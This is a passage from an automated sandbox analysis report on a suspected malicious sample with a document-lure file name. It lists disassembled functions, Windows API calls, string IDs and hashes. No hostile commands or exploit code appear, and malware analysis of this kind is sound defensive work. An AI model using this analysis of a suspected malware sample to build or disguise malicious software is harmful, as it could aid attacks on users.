                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID:
                                                        • API String ID: 641708696-0
                                                        • Opcode ID: 17c24e681ffe801b089509843d251b0168bffd543b99b3b8318d66fce0fd6bfe
                                                        • Instruction ID: d3bd519dd4aa6ffbe130221a799664930ed606f13b3646cd27b12aea8feaf8b5
                                                        • Opcode Fuzzy Hash: 17c24e681ffe801b089509843d251b0168bffd543b99b3b8318d66fce0fd6bfe
                                                        • Instruction Fuzzy Hash: 64618D31114661EFCB39DF98ED88B29B7F1FB51312F108938E9425A9A0C771AC96DF90
                                                        Function 00A221A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A225DB: GetWindowLongW.USER32(?,000000EB), ref: 00A225EC
                                                        • GetSysColor.USER32(0000000F), ref: 00A221D3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID:
                                                        • API String ID: 259745315-0
                                                        • Opcode ID: 57ad8e1e2725b6f040c782bb29017a7093c063464e5c25100e78a17952947645
                                                        • Instruction ID: 32e216f1fd6ae64f22de523a9b15679d7ce1c801c662e855ad1d232743e2e794
                                                        • Opcode Fuzzy Hash: 57ad8e1e2725b6f040c782bb29017a7093c063464e5c25100e78a17952947645
                                                        • Instruction Fuzzy Hash: 69419F31100650EEDB259FACEC88BB93B65EB06331F144375FE659A1E6C7328C42DB61
                                                        Function 00A8AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,00AAF910), ref: 00A8AB76
                                                        • GetDriveTypeW.KERNEL32(00000061,00ADA620,00000061), ref: 00A8AC40
                                                        • _wcscpy.LIBCMT ref: 00A8AC6A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                        • API String ID: 2820617543-1000479233
                                                        • Opcode ID: 58afcf296745a123686e35052c70b8eca0eb4300697291d3574b36ca8fe81aa3
                                                        • Instruction ID: 2a77506d5dcdba923f466cc348fe2d97a44ab2d70334eb9262114e509f5c1807
                                                        • Opcode Fuzzy Hash: 58afcf296745a123686e35052c70b8eca0eb4300697291d3574b36ca8fe81aa3
                                                        • Instruction Fuzzy Hash: F4519C315083019FD714EF58D981EAAB7A5FFA0700F14482EF486972A2EB31DD0ACB53
                                                        Function 00AA88B4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AA896E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID: @U=u
                                                        • API String ID: 634782764-2594219639
                                                        • Opcode ID: 77086edc160f8263737404b7436cda8e9af3132b9bc91a30a42afde6303e7778
                                                        • Instruction ID: 63647f04d51bea5a1c90c8b3b235061943faec51432fccee0d12d1ab21309e71
                                                        • Opcode Fuzzy Hash: 77086edc160f8263737404b7436cda8e9af3132b9bc91a30a42afde6303e7778
                                                        • Instruction Fuzzy Hash: D951B430600245BFDF34DF68CC89BAA7BA5BB07390F604526F511E71E1DF79A9808B81
                                                        Function 00A22B72 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 161windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00A5C547
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A5C569
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00A5C581
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00A5C59F
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00A5C5C0
                                                        • DestroyIcon.USER32(00000000), ref: 00A5C5CF
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00A5C5EC
                                                        • DestroyIcon.USER32(?), ref: 00A5C5FB
                                                          • Part of subcall function 00AAA71E: DeleteObject.GDI32(00000000), ref: 00AAA757
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                        • String ID: @U=u
                                                        • API String ID: 2819616528-2594219639
                                                        • Opcode ID: fe4cd00a7550c45eca9b886cb100d704a6b9ceff96a447db41c5a12dd7efc184
                                                        • Instruction ID: d46aa3398b97d548786bdad31dbae71da07b6f5235ffeb9a8cb089d71198d0f2
                                                        • Opcode Fuzzy Hash: fe4cd00a7550c45eca9b886cb100d704a6b9ceff96a447db41c5a12dd7efc184
                                                        • Instruction Fuzzy Hash: BC517970640319AFDB24DFA8DC45FAA37B5FB59361F100528F902A72A0DB70ED81DB90
                                                        Function 00A29997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: __i64tow__itow__swprintf
                                                        • String ID: %.15g$0x%p$False$True
                                                        • API String ID: 421087845-2263619337
                                                        • Opcode ID: 95bebd13ffaab442053646762290daade1b678b948ea181509ea63126deaa74b
                                                        • Instruction ID: c025d388ae012da3875b37a26e5c5e9a989f8456f96e00ba7b3290cf3a53da7e
                                                        • Opcode Fuzzy Hash: 95bebd13ffaab442053646762290daade1b678b948ea181509ea63126deaa74b
                                                        • Instruction Fuzzy Hash: 0D410F71604615AEDB24EB38E942E7BB3F8FB88310F20487FE949D6291EA3199458B11
                                                        Function 00AA73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00AA73D9
                                                        • CreateMenu.USER32 ref: 00AA73F4
                                                        • SetMenu.USER32(?,00000000), ref: 00AA7403
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AA7490
                                                        • IsMenu.USER32(?), ref: 00AA74A6
                                                        • CreatePopupMenu.USER32 ref: 00AA74B0
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AA74DD
                                                        • DrawMenuBar.USER32 ref: 00AA74E5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                        • String ID: 0$F
                                                        • API String ID: 176399719-3044882817
                                                        • Opcode ID: 027e6ff6834dc003beda89dd4173eef9ef4f33839255d182023563105e575168
                                                        • Instruction ID: 3e78276e3e371f7c4514d4a8a554ae407f578d19d1e461b2a0604e87e852c4f3
                                                        • Opcode Fuzzy Hash: 027e6ff6834dc003beda89dd4173eef9ef4f33839255d182023563105e575168
                                                        • Instruction Fuzzy Hash: B3415679A0020AEFDB20DFA8DD84A9ABBF9FF4A340F144429E955973A0D731A910CB50
                                                        Function 00A79471 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 82windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A794F6
                                                        • GetDlgCtrlID.USER32 ref: 00A79501
                                                        • GetParent.USER32 ref: 00A7951D
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A79520
                                                        • GetDlgCtrlID.USER32(?), ref: 00A79529
                                                        • GetParent.USER32(?), ref: 00A79545
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A79548
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 1536045017-2258501812
                                                        • Opcode ID: 03d780926580dfc2c19183c3261519e363f44851015562e6d345c5e19bd04540
                                                        • Instruction ID: d5daeed4693da17e2c75a2bbc34b9de1dddf635905c4739e2dd04d79fb788265
                                                        • Opcode Fuzzy Hash: 03d780926580dfc2c19183c3261519e363f44851015562e6d345c5e19bd04540
                                                        • Instruction Fuzzy Hash: 2221E270900114BFDF04EBA4CC85EFEBB75EF45300F108126B922972E1DB759919DB60
                                                        Function 00A7955C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A7B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00A7B0E7
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A795DF
                                                        • GetDlgCtrlID.USER32 ref: 00A795EA
                                                        • GetParent.USER32 ref: 00A79606
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00A79609
                                                        • GetDlgCtrlID.USER32(?), ref: 00A79612
                                                        • GetParent.USER32(?), ref: 00A7962E
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00A79631
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 1536045017-2258501812
                                                        • Opcode ID: 7a8a16d36dcedad91020be9cc7c57eef08ab556823dc17ad242db525bd9c21ec
                                                        • Instruction ID: cd5686b9c81f43be72fce03d1e41259cea931435d09c770ac2b6257fbe5182ea
                                                        • Opcode Fuzzy Hash: 7a8a16d36dcedad91020be9cc7c57eef08ab556823dc17ad242db525bd9c21ec
                                                        • Instruction Fuzzy Hash: 5321C170900244BFDF04EBA4CC85EFEBB78EF49300F108126B921972E1DB75991ADB20
                                                        Function 00A79645 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 72windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetParent.USER32 ref: 00A79651
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00A79666
                                                        • _wcscmp.LIBCMT ref: 00A79678
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A796F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-1428604138
                                                        • Opcode ID: 60c3015de6b1fd9385c4a203c708b0a6ec2aa86a99616dcca833cb8acc9c2892
                                                        • Instruction ID: d1b68f673ca80af41728f633c5900265c3e0da78f5148046666488c13d40ca69
                                                        • Opcode Fuzzy Hash: 60c3015de6b1fd9385c4a203c708b0a6ec2aa86a99616dcca833cb8acc9c2892
                                                        • Instruction Fuzzy Hash: 93112C7B248307BAFE052724EC07DA7779CEB05760F208267FA09E50D1FFA199114658
                                                        Function 00A47040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A4707B
                                                          • Part of subcall function 00A48D68: __getptd_noexit.LIBCMT ref: 00A48D68
                                                        • __gmtime64_s.LIBCMT ref: 00A47114
                                                        • __gmtime64_s.LIBCMT ref: 00A4714A
                                                        • __gmtime64_s.LIBCMT ref: 00A47167
                                                        • __allrem.LIBCMT ref: 00A471BD
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A471D9
                                                        • __allrem.LIBCMT ref: 00A471F0
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A4720E
                                                        • __allrem.LIBCMT ref: 00A47225
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A47243
                                                        • __invoke_watson.LIBCMT ref: 00A472B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                        • String ID:
                                                        • API String ID: 384356119-0
                                                        • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                        • Instruction ID: 8fe6ae21a0ea37c207079c226cdbc2b474d8d4ac09781d0f007fc6a962626bd9
                                                        • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                        • Instruction Fuzzy Hash: 20711676A05756ABDB149F79CD41BAEB3A8BFD4324F10423AF814E6281E7B0D9448790
                                                        Function 00A82A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A82A31
                                                        • GetMenuItemInfoW.USER32(00AE6890,000000FF,00000000,00000030), ref: 00A82A92
                                                        • SetMenuItemInfoW.USER32(00AE6890,00000004,00000000,00000030), ref: 00A82AC8
                                                        • Sleep.KERNEL32(000001F4), ref: 00A82ADA
                                                        • GetMenuItemCount.USER32(?), ref: 00A82B1E
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00A82B3A
                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00A82B64
                                                        • GetMenuItemID.USER32(?,?), ref: 00A82BA9
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A82BEF
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A82C03
                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A82C24
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                        • String ID:
                                                        • API String ID: 4176008265-0
                                                        • Opcode ID: 0e2cf09bf8675fb39772967280a4293c60294167767937c98d34710d8871882e
                                                        • Instruction ID: 99b6cd052116acd3677561840ced3c5323d949e6cbea08988ced496ec86be64f
                                                        • Opcode Fuzzy Hash: 0e2cf09bf8675fb39772967280a4293c60294167767937c98d34710d8871882e
                                                        • Instruction Fuzzy Hash: A861AFB090124AAFDB25EFA4CD88FBEBBB8FF41344F144569E84197291D731AD06DB20
                                                        Function 00AA7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AA7214
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AA7217
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AA723B
                                                        • _memset.LIBCMT ref: 00AA724C
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AA725E
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AA72D6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow_memset
                                                        • String ID:
                                                        • API String ID: 830647256-0
                                                        • Opcode ID: 5640c2ab2419ca70f889d32d17d143a204f312691d6b7638d27e44efc9767638
                                                        • Instruction ID: 2f725da67713a6db9ddec8ac37704f1e57519d9343f46ee7e78c32c12b5c6844
                                                        • Opcode Fuzzy Hash: 5640c2ab2419ca70f889d32d17d143a204f312691d6b7638d27e44efc9767638
                                                        • Instruction Fuzzy Hash: 99618C71900248AFDB11DFA8CC81EEE77F8EB0A700F144559FA15AB2E1D770AD45DBA0
                                                        Function 00A7710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A77135
                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00A7718E
                                                        • VariantInit.OLEAUT32(?), ref: 00A771A0
                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A771C0
                                                        • VariantCopy.OLEAUT32(?,?), ref: 00A77213
                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A77227
                                                        • VariantClear.OLEAUT32(?), ref: 00A7723C
                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00A77249
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A77252
                                                        • VariantClear.OLEAUT32(?), ref: 00A77264
                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A7726F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                        • String ID:
                                                        • API String ID: 2706829360-0
                                                        • Opcode ID: c9e13fc25824238f6681278b686c16683ffe0c565daaeeb41db2e9c7166d4478
                                                        • Instruction ID: 1a34a5eda42928f03f50c4ec1b338e09b35c9ed2b01ed1138253ef29d228536d
                                                        • Opcode Fuzzy Hash: c9e13fc25824238f6681278b686c16683ffe0c565daaeeb41db2e9c7166d4478
                                                        • Instruction Fuzzy Hash: 56413E75A04219AFCF04DFA8DD449EEBBB9FF48354F00C069F959A7261DB30A946CB90
                                                        Function 00AAD74C Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 257windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00AAD78A
                                                        • GetSystemMetrics.USER32(0000000F), ref: 00AAD7AA
                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00AAD9E5
                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00AADA03
